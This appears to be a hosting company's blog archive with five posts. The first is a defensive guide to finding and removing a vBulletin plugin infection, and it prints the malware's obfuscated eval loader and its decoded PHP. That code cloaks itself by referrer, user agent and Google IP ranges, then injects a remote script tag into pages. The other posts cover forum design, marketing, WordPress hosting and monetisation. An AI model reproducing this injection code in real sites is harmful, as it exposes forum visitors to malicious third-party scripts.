Archive For: July, 2012

Cleaning up vBulletin Script Injections

Cleaning up vBulletin Script Injections
We’ve run across this hard to find script a few times in the past few weeks. The script set conditions around specific referrers and user-agents. While it’s hard to find, the fix is simple.

It happens like this: a user comes to the forum from a Google search page (SERP) and they are greeted with this payload:
<script type=”text/javascript” src=”http://www.pixxxxoons.org/ijr.js

The script loaded to vBulletin’s headinclude. Now for the fun part- a search of the files did not find it. A Database restore won’t fix it and searching terms representative of encoded values – eval, base_64, etc.. came up blank too.

What happens is the malware rewrites the theme code itself, making detection difficult. We realized this was happening after finding that the site wasn’t responding to two scripts in the headinclude.

The fix is straightforward: the malware installs a plugin “vBulletin_hooks” and loads it globally. All that’s needed is to remove the plugin, reset datastores, and you are done.

If you’re a bit curious and want to check the entire process, start with checking inside the database.

Using PHPMyAdmin, search the entire database for %eval%”.

That search should bring up several entries. We started with the datastore table (“eval” strings there load with the template), and there, we found this looking a bit odd:

$xhTuAS = “\x62?.”\x61?.”\x73?.”\x65?.@eval($xhTuAS(“DQpmdW5jdGlvbiBISGhwZ0h..
zY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiIHNyYz1cImh0dHA6Ly93d3cucGlzZXptYWt..
+PC9zY3JpcHQ+Iiwkb3V0cHV0KSk7DQp9DQpmdW5jdGlvbiB4ZnJFbHVhKCkgew0KaWYocHJlZ”));

After decoding, we found that it was up to this:

function HHhpgHoev($output) {
$find_me = ‘connection-min.js?v=387?>’;
return ($output = str_replace($find_me,$find_me.”\r\n<script type=\”text/javascript\”
src=\”http://www.pisezmakoons.org/ijr.js? “,$output));
}
function xfrElua() {
if(preg_match(‘#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|…
‘,$_SERVER[‘HTTP_REFERER’])) {
if(preg_match(‘#msie|myie|ie|firefox|opera|media center#i’,$_SERVER[‘HTTP_USER_AGENT’])) return true;
}
}
function kOBFvnrcO() {
$a = array(‘216.239.’,’209.85.’,’173.255.’,’173.194.’,’89.207.’,’74.125.’,…’);
foreach($a as $b) {
if(preg_match(“/^$b/i”,$_SERVER[‘REMOTE_ADDR’])) return true;
}
}
if(!empty($_SERVER[‘HTTP_REFERER’])) {
if(xfrElua() and !kOBFvnrcO()) {
$output = HHhpgHoev($output);
}
}

You know the rest – a lot of work. Luckily, the fix was easy.

You know your site has the infection if you Google it, click on it from the Google search page, and it takes you back to the Google home page.

At URLJet, we offer professional, reliable managed forum hosting for some of the worlds largest forums, including fortune 500 companies and even professional sports teams. vBulletin is all we do, all day, everyday. Trust the vBulletin experts at URLJet to host your vBulletin forum. We guarantee we can run your forum faster, better, and more reliable than anyone… PERIOD! Email us at sales@urljet.com to get started!

Read More

Design Matters: Picking the Best vBulletin Layout for Your Site

Design Matters: Picking the Best vBulletin Layout for Your Site
Chances are you are just starting your vBulletin forum and one of the first things you will have to do is choose a layout. This may seem like a daunting task, but with a few tips you will feel more confident in your site.

When choosing a style for your site, you should choose something that is easy on the eyes. Pick colors that go together, look professional, and fit the time period. Also make sure the style is simple and the information is easy to find. Many people do not like searching and would rather click the back button on their browser than search your site.

With any forum, starting out you get to decide what categories you want for your forum. In addition to this, you will have a few members on your site. Keeping these two things in mind, you should limit the number of categories on your site. To encourage discussion and to turn visitors into members, you should keep them simple and broad. Doing this will keep your forum from looking empty and unappealing. Users go to these sites for discussion and to have their voice heard. If a site looks empty, they will end up going elsewhere. Once you gain members, you can then expand your site.

Finally, you should remember your site’s demographic and try to appeal to them. Think of categories your members would want to talk about. Look at other sites to gain ideas, but remember that you are just starting out, so naturally they will have more members and more categories than you. You can always ask other people in your demographic to see what they want to talk about. The answers may surprise you and could help determine your site layout.

While choosing the right site layout may be difficult, picking the right company to host your vBulletin community is easy. At URL Jet, we are the #1 high performance vBulletin hosting leader. Call us today at 1-888-699-2609 or visit our website, http://www.urljet.com/, to see the other services URL Jet can offer your business.

Read More

Forum Marketing: How-To

Forum Marketing: How-To
Marketing a business through online forums is a cost effective way to grow a business quickly and make it stand apart from the crowd. The people who frequent forums and message boards on the Internet today are generally very familiar with doing business on the web and it is not unusual for the users to be experts on the specific niche topics covered by a particular forum. This means that marketing your own business, product, service or website with forum marketing is a low-cost, high potential business strategy that can get your message out quickly and help your marketing efforts exponentially.

However, as good as online forums are today, not every forum in a particular niche will be worth investing your time in and this means it can be critically important to start with the right forum community for your specific niche business or interest. You can start your search using niche-specific keywords to locate the various online communities in your field that will be worth your time. You can narrow your list of potential targets by looking for forums that have at least 1,000 members and 10,000 existing posts. A good forum should also get a minimum of at least ten to fifteen new posts daily. Obviously, you don’t want to waste your time farming leads on a forum that is overrun by spam or hosted by a direct competitor to your own specific business.

One good strategy is to create your own forum account as soon as possible because users with older registration dates are usually given more privileges and access to more features than brand new members. You want to focus on becoming a participating member of the forums you plan to use as permanent marketing channels for your business, instead of just dropping in to push your latest advertising campaign.

It is also very important to check out the user agreements and posting guidelines of the forums you are interested in because they can affect your ability to market effectively. You will need to pay particular attention to whether or not users are allowed place links in their posts to promote their own businesses. You will also need to know if users are allowed to post commercial messages or directly contact other forum members for commercial purposes.

Spend some time reading the forum in the beginning and try to resist the urge to start posting right away. Spend time reading the forum to get a sense of the community’s mentality and to determine who the most influential posters are and which specific topics generate the most interest. Many forums are tight communities and learning how a forum works up front will help you fit in more quickly and start making valuable contributions sooner. When you do make contributions, you should recognize that whenever someone posts a thread or asks a question related to your business products or services, the answers you supply are the key to successful forum marketing.   Useful answers can help demonstrate your expertise and generate trust. When you back up your advice with useful related links and respond to follow up questions quickly, the entire forum community will come to regard you as an expert in your field. Take it easy on the strong opinions and sales pitches in the beginning and the level of trust will increase to the point where people will ask for your recommendations. When you start getting direct inquiries for recommendations is the right time to bring up your own products or business without appearing overly biased.

Once you have earned the trust of the forum users you can start more aggressive marketing campaigns, but don’t fall into the trap of loading a forum with spam messages. Forum spam might increase temporary traffic to your website or business, but it can also seriously damage your reputation in the long run.   Ethical marketing practices that enhance your image will encourage far more forum users to learn more about your business than any amount of spam ever could. Starting slowly and learning all you can about your target forum before you start posting will allow you to take full advantage of the true potential and help you create a low-cost, high-yield marketing strategy that really works on the Internet today.

Read More

WordPress Hosting for High Traffic Sites

Wordpress Hosting for High Traffic Sites
WordPress is a good choice of platform to host a high-traffic website or blog because it was designed to be able to handle large amounts of traffic from the start. However, you will need to make sure your web server, caching system, and file sizes are actually able to handle high traffic volume. WordPress can handle only as much traffic as can be supported by the hardware it runs on and the two main obstacles to handling large volumes of traffic are processor limitations and network limitations. The processor limitations show up when a website’s traffic puts high demands on a server’s processor power and memory resources. The WordPress application depends on MySQL to store data for producing output and each request that WordPress makes to MySQL for data creates additional loads on the server. Although WordPress is optimized to reduce the number of different actions required to perform its functions, the plug-ins or themes you use in the WordPress installation can also affect in the reliance on MySQL.

When traffic to a site is extremely high, the number of simultaneous connections to the database put a big load on the server and some connections may not go through and will result in the “connection timed out” display on a visitor’s browser. Because WordPress is a web-server-neutral application, it can run on several different platforms, including Apache and Linux, but any server that fully supports PHP and MySQL can get the job done. As PHP interprets the WordPress code, it can also affect your server’s performance when it creates a new version of the PHP program for every PHP file that a visitor requests. This means you need to be aware of the demands traffic puts on your server. Network limitations become a factor when a server’s connection to the Internet is too slow to serve up the pages you want as fast as you like. Because your server’s network provider connects to their internal network with an Ethernet adapter at a specific designated speed (usually 10Mb/s, 100Mb/s, or 1Gb/s) the server cannot transferring files any faster than that speed. Actually, a server cannot really even transfer files at the maximum rate specified by the adapter because the server is constantly sending and receiving routing information and only part of the full bandwidth is actually available for transferring files.   Because your network provider has limited bandwidth that must be shared, your network provider’s capabilities will limit transfer speeds more than the server’s network adapter.

Some network providers also offer the ability to handle bursts of data that can temporarily exceed pre-set transfer speed limits in instances when demand is the highest. The bandwidth of a connection is important to high-traffic sites because if just one dozen people hit a site at the same time, and that rate is sustained over time, a site would need at least a 15Mb/s connection to keep up. The bandwidth of the connection is important to any high-traffic website because an adapter with a maximum speed of just 10Mb/s could be overwhelmed by just one dozen sustained visitors.   You don’t have to receive 100,000 hits a day to cause problems either.  If your visitors concentrate access to a particular time of day or automated spam tries to access your system multiple times, it could result in many dropped requests. A 100Mb/s connection could handle very high rates of simultaneous traffic, but most network providers won’t offer that level of speed without extra fees, and most current shared hosting plans like WordPress don’t offer it at all. Most hosting services provide a fixed amount of overall transfer and if your account goes over the limit, you will get charged for the extra data transferred. The general rule is that the higher the transfer limit is, the more your hosting plan will cost. There are hosting services that do offer unlimited data transfer plans, but they will obviously cost a lot more, although maybe not as much as paying for transfer overages on a high-traffic site.

One way to optimize the performance of your high traffic website and avoid extra transfer charges is to use a Content Delivery Network in conjunction with your site that will help you avoid expensive overages and the bandwidth limitations imposed by some of the more popular hosting providers. In the end, your server is only as capable as your network provider is, and if your provider cannot provide the bandwidth you need, you have two options. You can try to negotiate a better price for increased bandwidth, or you can simply find a different provider that does provide the resources your high traffic site requires.

Read More

Monetizing Forums

Monetizing Your Forum
Forums and message boards have become a big part of the Internet over the last decade and today you can find thousands of different groups gathered to share the latest info on just about any niche topic, passion or pursuit you can think of. The power and global reach of the Internet has made it easier than ever before for like-minded people to get together and thoroughly explore the products, people, places and things that interest them the most.

Although many forums have been born out of a passion for a particular subject or topic, it takes more than passion alone to keep a site up and running actively on the web these days. If you’re a forum owner, you know that it costs money and takes time to run a successful forum. If you’re independently wealthy, or just feel like operating your forum at a loss due to your enthusiasm for a certain niche, that’s fine. However, in the real world most forum owners need a way to recoup their expenses and cover the time spent managing their forums.

Fortunately, there are now a number of different ways forum owners can cover their operating costs and even make a profit in many cases:

  • Paid memberships – Paid memberships can generate income from a two-tiered content system when a forum has good enough free content to attract new members and a level of even better content available only to the paid members. The object is to convert the free visitors into premium or paid members as quickly as possible.
  • Advertising Networks – Advertising networks like Google’s Adsense and the Yahoo! publisher networks are some of the most direct and proven ways to monetize a forum. VigLink is another way of monetizing content with links from targeted content to advertisers. Most forums deal with specific niches and there are many smaller ad networks server these targeted niches. The trick is finding the one best suited to your users needs. Income is earned whenever forum visitors click on the rotating ads that are supplied and maintained by the advertiser network. Depending on a forum’s specific focus, third-party ads alone can often generate enough income to maintain a forum.
  • Advertising – You can sell direct ad space on a forum to potential advertisers that are related in any way to the specific content on your site. There are also programs like OpenX available that will allow you to sell advertisements for specific geographic regions too. Remember that selling ad space also comes along with account management duties like maintaining ad inventory; chasing down late payments; and uploading new ads.
  • Sponsors – Sometimes specific companies with products related to your forum will step up and sponsor your site. Enticements could include “sponsored by” banners, product prizes or even new forum threads dedicated to discussing a company’s product.
  • Affiliates – As an alternative to direct advertising, forums can carry advertisements for affiliate programs that relevant to the forum and can be worked into the discussion threads. Companies or other sites selling products related to a forum niche like books and DVDs are always good potential affiliates.
  • Donations – Sites without a lot of advertising on them can ask for donations after they explain what good purpose or cause the money will be used for. Although most donations are simply usually utilized to run a forum, visitors that do donate can be given special privileges or access to specific content similar to a paid membership in order to sweeten the deal. A Paypal donation button on the site can be a very useful tool when asking for donations.
  • Product Sales – Although direct product sales comes along with the duties of maintaining inventory, collecting payments and shipping, selling products with a shopping cart plug-in on your site can be an effective alternative to affiliate programs or t direct ad sales.
  • Classified Ads – Some of the larger, product-oriented niche forums have had good success with classified advertising sections onsite. If enough members will pay a small fee to advertise their stuff for sale or trade on your site, it can generate significant income.
  • Sell Links – Forum owners can always offer links to other sites for a fee. Third party link brokers like Text Link Ads will handle the details if you wish, or you can sell the links by yourself, and collect the payments and insert the links on your own.

Some methods of monetizing a forum obviously require more work than others. Collecting donations, working with affiliates and hosting Adsense ads are all fairly passive methods of generating cash. Direct advertising or direct product sales are more active methods that will require a bit more work. However, in the end, the methods of monetization you eventually choose will probably depend on the traffic your site gets and the niche it is in.

Read More